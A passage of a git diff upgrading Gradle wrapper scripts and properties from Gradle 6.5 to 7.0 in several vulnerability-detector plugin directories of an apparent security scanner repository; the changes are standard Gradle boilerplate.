filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat b/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat +++ b/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/redis/gradlew b/google/detectors/rce/redis/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/redis/gradlew +++ b/google/detectors/rce/redis/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/redis/gradlew.bat b/google/detectors/rce/redis/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/redis/gradlew.bat +++ b/google/detectors/rce/redis/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% 
@@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal 
diff --git a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/solr_cve201917558/gradlew b/google/detectors/rce/solr_cve201917558/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/solr_cve201917558/gradlew +++ b/google/detectors/rce/solr_cve201917558/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore 